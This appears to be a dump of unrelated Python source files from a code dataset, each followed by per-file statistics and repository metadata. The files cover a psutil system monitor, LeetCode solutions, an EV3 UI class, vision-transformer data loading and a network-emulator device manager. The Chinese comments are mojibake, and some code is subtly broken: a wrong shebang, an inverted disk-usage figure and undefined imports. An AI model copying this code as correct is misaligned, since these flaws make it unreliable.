#!user/bin/env python3
# -*- coding: utf-8 -*-
import psutil
cpu_info = {'user': 0, 'system': 0, 'idle': 0, 'percent': 0}
memory_info = {'total': 0, 'available': 0,
'percent': 0, 'used': 0, 'free': 0}
disk_id = []
disk_total = []
disk_used = []
disk_free = []
disk_percent = []
# get cpu information
def get_cpu_info():
cpu_times = psutil.cpu_times()
cpu_info['user'] = cpu_times.user
cpu_info['system'] = cpu_times.system
cpu_info['idle'] = cpu_times.idle
cpu_info['percent'] = psutil.cpu_percent(interval=2)
# get memory information
def get_memory_info():
mem_info = psutil.virtual_memory()
memory_info['total'] = mem_info.total
memory_info['available'] = mem_info.available
memory_info['percent'] = mem_info.percent
memory_info['used'] = mem_info.used
memory_info['free'] = mem_info.free
def get_disk_info():
for id in psutil.disk_partitions():
if 'cdrom' in id.opts or id.fstype == '':
continue
disk_name = id.device.split(':')
s = disk_name[0]
disk_id.append(s)
disk_info = psutil.disk_usage(id.device)
disk_total.append(disk_info.total)
disk_used.append(disk_info.used)
disk_free.append(disk_info.free)
disk_percent.append(disk_info.percent)
if __name__ == '__main__':
get_cpu_info()
cpu_status = cpu_info['percent']
print('cpu usage is:%s%%' % cpu_status)
get_memory_info()
mem_status = memory_info['percent']
print('memory usage is:%s%%' % mem_status)
get_disk_info()
for i in range(len(disk_id)):
print('%sdisk usage is:%s%%' % (disk_id[i], 100 - disk_percent[i]))
| 26.685714
| 75
| 0.646681
| 270
| 1,868
| 4.207407
| 0.288889
| 0.079225
| 0.049296
| 0.022887
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02961
| 0.204497
| 1,868
| 69
| 76
| 27.072464
| 0.734859
| 0.14561
| 0
| 0
| 0
| 0
| 0.116352
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068182
| false
| 0
| 0.022727
| 0
| 0.090909
| 0.068182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5924218bd91ec5cd3a910146334e0e5acd39d37
| 1,592
|
py
|
Python
|
SS/p202.py
|
MTandHJ/leetcode
|
f3832ed255d259cb881666ec8bd3de090d34e883
|
[
"MIT"
] | null | null | null |
SS/p202.py
|
MTandHJ/leetcode
|
f3832ed255d259cb881666ec8bd3de090d34e883
|
[
"MIT"
] | null | null | null |
SS/p202.py
|
MTandHJ/leetcode
|
f3832ed255d259cb881666ec8bd3de090d34e883
|
[
"MIT"
] | null | null | null |
"""
็ผๅไธไธช็ฎๆณๆฅๅคๆญไธไธชๆฐ n ๆฏไธๆฏๅฟซไนๆฐใ
ใๅฟซไนๆฐใๅฎไนไธบ๏ผ
ๅฏนไบไธไธชๆญฃๆดๆฐ๏ผๆฏไธๆฌกๅฐ่ฏฅๆฐๆฟๆขไธบๅฎๆฏไธชไฝ็ฝฎไธ็ๆฐๅญ็ๅนณๆนๅใ
็ถๅ้ๅค่ฟไธช่ฟ็จ็ดๅฐ่ฟไธชๆฐๅไธบ 1๏ผไนๅฏ่ฝๆฏ ๆ ้ๅพช็ฏ ไฝๅง็ปๅไธๅฐ 1ใ
ๅฆๆ ๅฏไปฅๅไธบย 1๏ผ้ฃไน่ฟไธชๆฐๅฐฑๆฏๅฟซไนๆฐใ
ๅฆๆ n ๆฏๅฟซไนๆฐๅฐฑ่ฟๅ true ๏ผไธๆฏ๏ผๅ่ฟๅ false ใ
ๆฅๆบ๏ผๅๆฃ๏ผLeetCode๏ผ
้พๆฅ๏ผhttps://leetcode-cn.com/problems/happy-number
่ไฝๆๅฝ้ขๆฃ็ฝ็ปๆๆใๅไธ่ฝฌ่ฝฝ่ฏท่็ณปๅฎๆนๆๆ๏ผ้ๅไธ่ฝฌ่ฝฝ่ฏทๆณจๆๅบๅคใ
"""
from typing import List
class Solution:
def isHappy(self, n: int) -> bool:
# ๅ
ๆฑๅบไธไธชๆฐ็ไธชๅ็พๅ
LIMIT = 1000
nums = list(map(int, list(str(n))))
cnt = 0
# res = n
res = self.square_sum(nums)
while cnt < LIMIT:
if res == 1:
return True
else:
nums = list(map(int, list(str(res))))
res = self.square_sum(nums)
cnt += 1
return False
def square_sum(self, nums:List[int]) -> int:
def my_pow(x):
return x ** 2
return sum(list(map(my_pow, nums)))
# hash่กจๆนๆณ
class Solution:
def isHappy(self, n: int) -> bool:
# ๅๅปบไธไธชๅๅงhashๆ ๅฐๆฅๅญๅจk-vๆ ๅฐ
res_sum = set()
# ๅฎไนไธไธชๅฝๆฐๆฅ่ทๅไธ่ฝฎๅนณๆนๅไนๅ็ๆฐๆฎ
def getNext(n: int) -> int:
res_sum = 0
# ๅฝ่ณๅฐไบไฝๆฐๆถ
while n > 0:
n, digit = divmod(n, 10)
res_sum += digit ** 2
return res_sum
# ๆดๆฐๆฐๆฎ๏ผ่ฟ่กๅคๆญ
# ๅฝ่ฟไธชไนฆๅจres_sumไธญๅบ็ฐ่ฟ๏ผไธไธๆฏ1๏ผๅ่ฏดๆๅทฒ็ป่ฟๅ
ฅๅพช็ฏ
# ไธๅพช็ฏๆฏ่ทณไธๅบๆฅ็
while n != 1:
n = getNext(n)
if n in res_sum:
return False
res_sum.add(n)
return True
# for test
if __name__ == "__main__":
ins = Solution()
n = 19
print(ins.isHappy(n))
| 21.808219
| 53
| 0.523241
| 194
| 1,592
| 4.190722
| 0.458763
| 0.04428
| 0.03936
| 0.056581
| 0.186962
| 0.137761
| 0.086101
| 0.086101
| 0
| 0
| 0
| 0.01996
| 0.370603
| 1,592
| 72
| 54
| 22.111111
| 0.791417
| 0.251884
| 0
| 0.263158
| 0
| 0
| 0.006814
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.131579
| false
| 0
| 0.026316
| 0.026316
| 0.394737
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5964514746ca9cd43f5272151dd592b02ad5040
| 2,309
|
py
|
Python
|
UI/UIObject.py
|
R2D2Hud/CharlieOSX
|
37c4edb0b31eda8082acd8e31afc3dc85fd75abe
|
[
"MIT"
] | 12
|
2020-04-11T13:10:14.000Z
|
2022-03-24T09:12:54.000Z
|
UI/UIObject.py
|
R2D2Hud/CharlieOSX
|
37c4edb0b31eda8082acd8e31afc3dc85fd75abe
|
[
"MIT"
] | 14
|
2020-01-24T14:07:45.000Z
|
2020-12-20T19:14:04.000Z
|
UI/UIObject.py
|
R2D2Hud/CharlieOSX
|
37c4edb0b31eda8082acd8e31afc3dc85fd75abe
|
[
"MIT"
] | 11
|
2020-06-19T20:12:43.000Z
|
2021-04-25T05:02:20.000Z
|
from profileHelper import ProfileHelper
from pybricks.parameters import Button, Color
from pybricks.media.ev3dev import Image, ImageFile, Font, SoundFile
# from UI.tools import Box
class UIObject:
def __init__(self, name: str, brick: EV3Brick, bounds: Box, contentType, content, padding=(0, 0, False), font=Font(family='arial', size=11), visible=True):
# self.logger = logger
self.name = name
self.brick = brick
self.bounds = bounds
self.padding = padding
self.contentType = contentType
self.content = content
self.font = font
self.visibility = visible
self.radius = 0
self.selected = False
def getName(self):
return self.name
def setVisibility(self, visibility: bool):
self.visibility = visibility
def getVisibility(self):
return self.visibility
def update(self):
pass
def draw(self, selected=False):
if self.padding[2]:
x = self.padding[0]
y = self.padding[1]
else:
x = self.bounds.x + self.padding[0]
y = self.bounds.y + self.padding[1]
if self.visibility:
if self.contentType == 'img':
if self.selected:
self.radius = 5
else:
self.radius = 0
self.brick.screen.draw_image(x, y, self.content, transparent=Color.RED)
elif self.contentType == 'textBox':
self.brick.screen.set_font(self.font)
self.brick.screen.draw_box(x, y, x + self.bounds.width, y + self.bounds.height, r=2, fill=True, color=Color.WHITE)
self.brick.screen.draw_box(x, y, x + self.bounds.width, y + self.bounds.height, r=2, fill=False if not selected else True, color=Color.BLACK)
self.brick.screen.draw_text(self.bounds.x + 1, self.bounds.y + 1, self.content, text_color=Color.BLACK if not selected else Color.WHITE)
else:
if self.contentType == 'textBox':
self.brick.screen.draw_box(x, y, x + self.bounds.width, y + self.bounds.height, r=2, fill=True, color=Color.WHITE)
def setClickAction(self, action: Function):
self.clickAction = action
def click(self):
self.clickAction()
| 37.241935
| 159
| 0.603725
| 292
| 2,309
| 4.736301
| 0.260274
| 0.079537
| 0.065076
| 0.068691
| 0.232827
| 0.232827
| 0.164136
| 0.164136
| 0.164136
| 0.164136
| 0
| 0.011557
| 0.288003
| 2,309
| 61
| 160
| 37.852459
| 0.829684
| 0.019489
| 0
| 0.142857
| 0
| 0
| 0.00973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163265
| false
| 0.020408
| 0.061224
| 0.040816
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a59648f6d46920ef327bbe7ce9659f9fe533785d
| 9,558
|
py
|
Python
|
factory.py
|
rosinality/vision-transformers-pytorch
|
b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f
|
[
"MIT"
] | 77
|
2021-04-03T06:44:19.000Z
|
2021-07-07T07:05:01.000Z
|
factory.py
|
rosinality/vision-transformers-pytorch
|
b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f
|
[
"MIT"
] | 1
|
2021-04-08T06:59:41.000Z
|
2021-04-08T11:20:32.000Z
|
factory.py
|
rosinality/vision-transformers-pytorch
|
b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f
|
[
"MIT"
] | 6
|
2021-04-15T13:36:37.000Z
|
2022-02-03T12:32:20.000Z
|
import os
from types import SimpleNamespace
import torch
from torch.utils.data import DataLoader
from torchvision import transforms
from PIL import Image
import numpy as np
from tensorfn import distributed as dist, nsml, get_logger
try:
from nvidia.dali.pipeline import Pipeline
from nvidia.dali import fn, types, pipeline_def
from nvidia.dali.plugin.pytorch import DALIClassificationIterator
except ImportError:
pass
from autoaugment import RandAugment
from dataset import LMDBDataset
from mix_dataset import MixDataset
from transforms import RandomErasing
def wd_skip_fn(skip_type):
def check_wd_skip_fn(name, param):
if skip_type == "nfnet":
return "bias" in name or "gain" in name
elif skip_type == "resnet":
return "bias" in name or "bn" in name or param.ndim == 1
elif skip_type == "vit":
return "bias" in name or "cls" in name or "norm" in name or param.ndim == 1
elif skip_type == "dino":
return "bias" in name or param.ndim == 1
return check_wd_skip_fn
def make_optimizer(train_conf, parameters):
lr = train_conf.base_lr * train_conf.dataloader.batch_size / 256
return train_conf.optimizer.make(parameters, lr=lr)
def make_scheduler(train_conf, optimizer, epoch_len):
warmup = train_conf.scheduler.warmup * epoch_len
n_iter = epoch_len * train_conf.epoch
lr = train_conf.base_lr * train_conf.dataloader.batch_size / 256
if train_conf.scheduler.type == "exp_epoch":
return train_conf.scheduler.make(
optimizer, epoch_len, lr=lr, max_iter=train_conf.epoch, warmup=warmup
)
else:
return train_conf.scheduler.make(optimizer, lr=lr, n_iter=n_iter, warmup=warmup)
def repeated_sampler(sampler):
epoch = 0
while True:
for i in sampler:
yield i
epoch += 1
sampler.set_epoch(epoch)
class ExternalSource:
def __init__(self, dataset, batch_size, shuffle, distributed):
self.dataset = dataset
self.batch_size = batch_size
self.sampler = dist.data_sampler(dataset, shuffle=True, distributed=distributed)
def __iter__(self):
self.generator = repeated_sampler(self.sampler)
return self
def __next__(self):
images, labels = [], []
for _ in range(self.batch_size):
img, label = self.dataset[next(self.generator)]
images.append(np.frombuffer(img, dtype=np.uint8))
labels.append(label)
return images, torch.tensor(labels, dtype=torch.int64)
# @pipeline_def
def dali_pipeline(source, image_size, training, cpu=False):
images, labels = fn.external_source(source=source, num_outputs=2)
if cpu:
device = "cpu"
images = fn.decoders.image(images, device=device)
else:
device = "gpu"
images = fn.decoders.image(
images,
device="mixed",
device_memory_padding=211025920,
host_memory_padding=140544512,
)
if training:
images = fn.random_resized_crop(
images,
device=device,
size=image_size,
interp_type=types.DALIInterpType.INTERP_CUBIC,
)
coin = fn.random.coin_flip(0.5)
images = fn.flip(images, horizontal=coin)
else:
pass
return images, labels
class DALIWrapper:
def __init__(self, pipeline):
self.dataloader = DALIClassificationIterator(pipeline)
def __iter__(self):
self.iterator = iter(self.dataloader)
return self
def __next__(self):
data = next(self.iterator)
image = data[0]["data"]
label = data[0]["label"]
def make_dali_dataloader(
path, train_size, valid_size, train_set, valid_set, batch, distributed, n_worker
):
pass
def make_augment_dataset(path, train_transform, valid_transform):
train_dir = os.path.join(nsml.DATASET_PATH, path, "train.lmdb")
valid_dir = os.path.join(nsml.DATASET_PATH, path, "valid.lmdb")
train_set = LMDBDataset(train_dir, train_transform)
valid_set = LMDBDataset(valid_dir, valid_transform)
return train_set, valid_set
def make_dataset(
path, train_size, valid_size, randaug_params, mix_params, erasing, verbose=True
):
train_dir = os.path.join(nsml.DATASET_PATH, path, "train.lmdb")
valid_dir = os.path.join(nsml.DATASET_PATH, path, "valid.lmdb")
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
)
transform_list = [
transforms.RandomResizedCrop(train_size, interpolation=Image.BICUBIC),
transforms.RandomHorizontalFlip(),
RandAugment(**randaug_params),
transforms.ToTensor(),
normalize,
]
if erasing > 0:
transform_list += [
RandomErasing(
erasing, mode="pixel", max_count=1, num_splits=0, device="cpu"
)
]
if mix_params["mix_before_aug"]:
preprocess = transform_list[:2]
postprocess = transform_list[2:]
else:
preprocess = transform_list
postprocess = []
if verbose:
logger = get_logger()
log = f"""Transforms
Transform before Mixes:
{preprocess}
Mixes: mixup={mix_params["mixup"]}, cutmix={mix_params["cutmix"]}"""
if mix_params["mix_before_aug"]:
log += f"""
Transform after Mixes:
{postprocess}"""
logger.info(log)
train_preprocess = transforms.Compose(preprocess)
train_postprocess = transforms.Compose(postprocess)
train_set = LMDBDataset(train_dir, train_preprocess)
train_set = MixDataset(
train_set, train_postprocess, mix_params["mixup"], mix_params["cutmix"]
)
valid_preprocess = transforms.Compose(
[
transforms.Resize(valid_size + 32, interpolation=Image.BICUBIC),
transforms.CenterCrop(valid_size),
transforms.ToTensor(),
normalize,
]
)
valid_set = LMDBDataset(valid_dir, valid_preprocess)
return train_set, valid_set
def make_dataset_cuda(path, train_size, valid_size, randaug_params, mixup, cutmix):
train_dir = os.path.join(nsml.DATASET_PATH, path, "train.lmdb")
valid_dir = os.path.join(nsml.DATASET_PATH, path, "valid.lmdb")
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
)
train_preprocess = transforms.Compose(
[
transforms.RandomResizedCrop(train_size, interpolation=Image.BICUBIC),
transforms.RandomHorizontalFlip(),
]
)
train_postprocess = transforms.Compose(
[RandAugment(**randaug_params), transforms.ToTensor(), normalize]
)
train_set = LMDBDataset(train_dir, train_preprocess)
train_set = MixDataset(train_set, train_postprocess, mixup, cutmix)
valid_preprocess = transforms.Compose(
[
transforms.Resize(valid_size + 32, interpolation=Image.BICUBIC),
transforms.CenterCrop(valid_size),
transforms.ToTensor(),
normalize,
]
)
valid_set = LMDBDataset(valid_dir, valid_preprocess)
return train_set, valid_set
def make_dataloader(train_set, valid_set, batch, distributed, n_worker):
batch_size = batch // dist.get_world_size()
train_sampler = dist.data_sampler(train_set, shuffle=True, distributed=distributed)
train_loader = DataLoader(
train_set, batch_size=batch_size, sampler=train_sampler, num_workers=n_worker
)
valid_loader = DataLoader(
valid_set,
batch_size=batch_size,
sampler=dist.data_sampler(valid_set, shuffle=False, distributed=distributed),
num_workers=n_worker,
)
return train_loader, valid_loader, train_sampler
def lerp(start, end, stage, max_stage):
return start + (end - start) * (stage / (max_stage - 1))
def progressive_adaptive_regularization(
stage,
max_stage,
train_sizes,
valid_sizes,
randaug_layers,
randaug_magnitudes,
mixups,
cutmixes,
dropouts,
drop_paths,
verbose=True,
):
train_size = int(lerp(*train_sizes, stage, max_stage))
valid_size = int(lerp(*valid_sizes, stage, max_stage))
randaug_layer = int(lerp(*randaug_layers, stage, max_stage))
randaug_magnitude = lerp(*randaug_magnitudes, stage, max_stage)
mixup = lerp(*mixups, stage, max_stage)
cutmix = lerp(*cutmixes, stage, max_stage)
dropout = lerp(*dropouts, stage, max_stage)
drop_path = lerp(*drop_paths, stage, max_stage)
if verbose:
logger = get_logger()
log = f"""Progressive Training with Adaptive Regularization
Stage: {stage + 1} / {max_stage}
Image Size: train={train_size}, valid={valid_size}
RandAugment: n_augment={randaug_layer}, magnitude={randaug_magnitude}
Mixup: {mixup}, Cutmix: {cutmix}, Dropout={dropout}, DropPath={drop_path}"""
logger.info(log)
return SimpleNamespace(
train_size=train_size,
valid_size=valid_size,
randaug_layer=randaug_layer,
randaug_magnitude=randaug_magnitude,
mixup=mixup,
cutmix=cutmix,
dropout=dropout,
drop_path=drop_path,
)
| 29.319018
| 89
| 0.643022
| 1,110
| 9,558
| 5.301802
| 0.188288
| 0.019031
| 0.024299
| 0.013254
| 0.383517
| 0.361767
| 0.28938
| 0.267969
| 0.247409
| 0.185557
| 0
| 0.0136
| 0.261456
| 9,558
| 325
| 90
| 29.409231
| 0.820088
| 0.00136
| 0
| 0.25
| 0
| 0
| 0.066175
| 0.01215
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077869
| false
| 0.012295
| 0.065574
| 0.004098
| 0.22541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a596a50f47d0ab9d4cfb1eb2e63d7c4e56340474
| 1,137
|
py
|
Python
|
Easy/1207.UniqueNumberofOccurrences.py
|
YuriSpiridonov/LeetCode
|
2dfcc9c71466ffa2ebc1c89e461ddfca92e2e781
|
[
"MIT"
] | 39
|
2020-07-04T11:15:13.000Z
|
2022-02-04T22:33:42.000Z
|
Easy/1207.UniqueNumberofOccurrences.py
|
YuriSpiridonov/LeetCode
|
2dfcc9c71466ffa2ebc1c89e461ddfca92e2e781
|
[
"MIT"
] | 1
|
2020-07-15T11:53:37.000Z
|
2020-07-15T11:53:37.000Z
|
Easy/1207.UniqueNumberofOccurrences.py
|
YuriSpiridonov/LeetCode
|
2dfcc9c71466ffa2ebc1c89e461ddfca92e2e781
|
[
"MIT"
] | 20
|
2020-07-14T19:12:53.000Z
|
2022-03-02T06:28:17.000Z
|
"""
Given an array of integers arr, write a function that returns true if and
only if the number of occurrences of each value in the array is unique.
Example:
Input: arr = [1,2,2,1,1,3]
Output: true
Explanation: The value 1 has 3 occurrences, 2 has 2 and 3 has 1. No two
values have the same number of occurrences.
Example:
Input: arr = [1,2]
Output: false
Example:
Input: arr = [-3,0,1,-3,1,1,1,-3,10,0]
Output: true
Constraints:
- 1 <= arr.length <= 1000
- -1000 <= arr[i] <= 1000
"""
#Difficulty: Easy
#63 / 63 test cases passed.
#Runtime: 48 ms
#Memory Usage: 13.8 MB
#Runtime: 48 ms, faster than 39.33% of Python3 online submissions for Unique Number of Occurrences.
#Memory Usage: 13.8 MB, less than 92.46% of Python3 online submissions for Unique Number of Occurrences.
class Solution:
def uniqueOccurrences(self, arr: List[int]) -> bool:
digits = {}
for d in arr:
if d not in digits:
digits[d] = 0
digits[d] += 1
return len(digits.keys()) == len(set(digits.values()))
| 29.153846
| 104
| 0.60774
| 175
| 1,137
| 3.948571
| 0.474286
| 0.04631
| 0.109986
| 0.04631
| 0.251809
| 0.156295
| 0.156295
| 0.156295
| 0.156295
| 0
| 0
| 0.078721
| 0.28496
| 1,137
| 38
| 105
| 29.921053
| 0.771218
| 0.689534
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a598b26fe309d9bc4db6c62f8d0ba413c791f7b0
| 9,360
|
py
|
Python
|
Playground3/src/playground/network/devices/pnms/PNMSDevice.py
|
kandarpck/networksecurity2018
|
dafe2ee8d39bd9596b1ce3fbc8b50ca645bcd626
|
[
"MIT"
] | 3
|
2018-10-25T16:03:53.000Z
|
2019-06-13T15:24:41.000Z
|
Playground3/src/playground/network/devices/pnms/PNMSDevice.py
|
kandarpck/networksecurity2018
|
dafe2ee8d39bd9596b1ce3fbc8b50ca645bcd626
|
[
"MIT"
] | null | null | null |
Playground3/src/playground/network/devices/pnms/PNMSDevice.py
|
kandarpck/networksecurity2018
|
dafe2ee8d39bd9596b1ce3fbc8b50ca645bcd626
|
[
"MIT"
] | null | null | null |
from playground.common.os import isPidAlive
from playground.common import CustomConstant as Constant
from .NetworkManager import NetworkManager, ConnectionDeviceAPI, RoutesDeviceAPI
import os, signal, time
class PNMSDeviceLoader(type):
"""
This metaclass for PNMS device types auto loads concrete device types
into the system.
"""
@classmethod
def loadPnmsDefinitions(cls, newClass):
if newClass.REGISTER_DEVICE_TYPE_NAME:
if newClass.REGISTER_DEVICE_TYPE_NAME in NetworkManager.REGISTERED_DEVICE_TYPES:
raise Exception("Duplicate Device Type Registration")
NetworkManager.REGISTERED_DEVICE_TYPES[newClass.REGISTER_DEVICE_TYPE_NAME] = newClass
for deviceType in newClass.CanConnectTo:
if not issubclass(deviceType, PNMSDevice):
raise Exception("Connect rules requires a subclass of device type. Got {}".format(deviceType))
rule = (newClass, deviceType)
if not ConnectionDeviceAPI.ConnectionPermitted(newClass, deviceType):
ConnectionDeviceAPI.PERMITTED_CONNECTION_TYPES.append(rule)
if newClass.CanRoute:
if not RoutesDeviceAPI.PermitsRouting(newClass):
RoutesDeviceAPI.PERMITTED_ROUTING_TYPES.append(newClass)
def __new__(cls, name, parents, dict):
definitionCls = super().__new__(cls, name, parents, dict)
cls.loadPnmsDefinitions(definitionCls)
return definitionCls
class PNMSDevice(metaclass=PNMSDeviceLoader):
CONFIG_TRUE = "true"
CONFIG_FALSE = "false"
CONFIG_OPTION_AUTO = "auto_enable"
"""
Sub classes that need access to the Connection section or
Routing section need to override these values
"""
CanConnectTo = []
CanRoute = False
STATUS_DISABLED = Constant(strValue="Disabled", boolValue=False)
STATUS_WAITING_FOR_DEPENDENCIES = Constant(strValue="Waiting", boolValue=False)
STATUS_ABNORMAL_SHUTDOWN = Constant(strValue="Abnormal Shutdown", boolValue=False)
STATUS_ENABLED = Constant(strValue="Enabled", boolValue=True)
REGISTER_DEVICE_TYPE_NAME = None # All abstract classes should leave this none. All concrete classes must specify.
def __init__(self, deviceName):
self._pnms = None
self._config = None
self._name = deviceName
self._deviceDependencies = set([])
# the status is the current status
self._enableStatus = self.STATUS_DISABLED
# the toggle is if there has been a request to go from one state to the other
self._enableToggle = False
def _cleanupFiles(self):
if not self._enableStatus:
runFiles = self._getDeviceRunFiles()
for file in runFiles:
if os.path.exists(file):
os.unlink(file)
def _reloadRuntimeData(self):
pass
def installToNetwork(self, pnms, mySection):
self._pnms = pnms
self._config = mySection
self._reloadRuntimeData()
# call self.enabled to correctly set enableStatus
# cannot call in constructor, requires self._pnms
self._runEnableStatusStateMachine()
def networkManager(self):
return self._pnms
def _sanitizeVerb(self, verb):
return verb.strip().lower()
def name(self):
return self._name
def dependenciesEnabled(self):
for device in self._deviceDependencies:
if not device.enabled(): return False
return True
def isAutoEnabled(self):
return self._config.get(self.CONFIG_OPTION_AUTO, self.CONFIG_FALSE) == self.CONFIG_TRUE
def pnmsAlert(self, device, alert, alertArgs):
if device in self._deviceDependencies:
if alert == device.enabled:
self._runEnableStatusStateMachine()
def initialize(self, args):
pass
def destroy(self):
pass
def enable(self):
if not self.enabled():
self._enableToggle = True
self._runEnableStatusStateMachine()
def disable(self):
if self.enabled():
self._enableToggle = True
self._runEnableStatusStateMachine()
def enabled(self):
self._cleanupFiles()
return self._enableStatus
def getPid(self):
statusFile, pidFile, lockFile = self._getDeviceRunFiles()
if os.path.exists(pidFile):
with open(pidFile) as f:
return int(f.read().strip())
return None
def config(self, verb, args):
pass
def query(self, verb, args):
return None
def _getDeviceRunFiles(self):
statusFile = os.path.join(self._pnms.location(), "device_{}.status".format(self.name()))
pidFile = os.path.join(self._pnms.location(), "device_{}.pid".format(self.name()))
lockFile = os.path.join(self._pnms.location(), "device_{}.pid.lock".format(self.name()))
return statusFile, pidFile, lockFile
def _running(self):
for requiredFile in self._getDeviceRunFiles():
if not os.path.exists(requiredFile):
return False
pid = self.getPid()
return pid and isPidAlive(pid)
def _runEnableStatusStateMachine(self):
newStatus = self._enableStatus
# TODO: I wrote this function in a 'haze' thinkin the manager keeps running.
# but, of course, it shuts down after run. There's going to be
# no callback. Well, I'm leaving this code in. Because, it may
# be that in the future I have a call-back system that works.
# but for now, let's try to activate everything.
if not self._enableStatus and self._enableToggle:
for device in self._deviceDependencies:
if not device.enabled():
device.enable()
if self._enableStatus in [self.STATUS_DISABLED, self.STATUS_ABNORMAL_SHUTDOWN]:
if self._running():
# We might have gotten here because of a restart
# or a toggle.
if self.dependenciesEnabled():
newStatus = self.STATUS_ENABLED
else:
# oops. A dependency has shut down.
# Assume this device was supposed to be enabled.
self._shutdown()
newStatus = self.STATUS_WAITING_FOR_DEPENDENCIES
elif self._enableToggle:
if self.dependenciesEnabled():
self._launch()
if self._running():
newStatus = self.STATUS_ENABLED
else:
newStatus = self.STATUS_ABNORMAL_SHUTDOWN
else:
newStatus = self.STATUS_DISABLED
elif self._enableStatus == self.STATUS_WAITING_FOR_DEPENDENCIES:
if self._enableToggle:
# we were trying to turn on, were waiting for deps, but now stop
newStatus = self.STATUS_DISABLED
elif self.dependenciesEnabled():
self._launch()
if self._running():
newStatus = self.STATUS_ENABLED
else:
newStatus = self.STATUS_ABNORMAL_SHUTDOWN
else:
newStatus = self.STATUS_WAITING_FOR_DEPENDENCIES
elif self._enableStatus == self.STATUS_ENABLED:
if self._enableToggle:
self._shutdown()
newStatus = self.STATUS_DISABLED
elif not self._running():
newStatus = self.STATUS_DISABLED
elif not self.dependenciesEnabled():
self._shutdown()
newStatus = self.STATUS_WAITING_FOR_DEPENDENCIES
else:
newStatus = self.STATUS_ENABLED
alert = (self._enableStatus != newStatus)
self._enableStatus = newStatus
self._enableToggle = False
self._pnms.postAlert(self.enable, self._enableStatus)
def _shutdown(self, timeout=5):
pid = self.getPid()
if pid:
os.kill(pid, signal.SIGTERM)
sleepCount = timeout
while isPidAlive(pid) and sleepCount > 0:
time.sleep(1)
sleepCount = sleepCount-1
if isPidAlive(pid):
raise Exception("Could not shut down device {}. (pid={})".format(self.name(), pid))
for file in self._getDeviceRunFiles():
if os.path.exists(file):
os.unlink(file)
def _launch(self, timeout=30):
pass
def _waitUntilRunning(self, timeout=30):
sleepCount = timeout
while not self._running() and sleepCount > 0:
time.sleep(1)
sleepCount = sleepCount - 1
return self._running()
| 39.327731
| 119
| 0.583761
| 912
| 9,360
| 5.83114
| 0.258772
| 0.033847
| 0.046446
| 0.026326
| 0.263445
| 0.215307
| 0.183904
| 0.163595
| 0.098909
| 0.050395
| 0
| 0.001789
| 0.343056
| 9,360
| 238
| 120
| 39.327731
| 0.863067
| 0.094017
| 0
| 0.340909
| 0
| 0
| 0.029059
| 0
| 0
| 0
| 0
| 0.004202
| 0
| 1
| 0.147727
| false
| 0.028409
| 0.022727
| 0.028409
| 0.318182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a59a37e3de5885e67c006743f177528505c3b6da
| 3,315
|
py
|
Python
|
core/eval.py
|
lmkoch/subgroup-shift-detection
|
31971704dc4a768db5e082e6e37a504f4e245224
|
[
"MIT"
] | null | null | null |
core/eval.py
|
lmkoch/subgroup-shift-detection
|
31971704dc4a768db5e082e6e37a504f4e245224
|
[
"MIT"
] | null | null | null |
core/eval.py
|
lmkoch/subgroup-shift-detection
|
31971704dc4a768db5e082e6e37a504f4e245224
|
[
"MIT"
] | 1
|
2022-01-26T09:54:41.000Z
|
2022-01-26T09:54:41.000Z
|
import os
import pandas as pd
import numpy as np
from core.dataset import dataset_fn
from core.model import model_fn, get_classification_model
from core.mmdd import trainer_object_fn
from core.muks import muks
def stderr_proportion(p, n):
return np.sqrt(p * (1-p) / n)
def eval(exp_dir, exp_name, params, seed, split, sample_sizes=[10, 30, 50, 100, 500],
num_reps=100, num_permutations=1000):
"""Analysis of test power vs sample size for both MMD-D and MUKS
Args:
exp_dir ([type]): exp base directory
exp_name ([type]): experiment name (hashed config)
params (Dict): [description]
seed (int): random seed
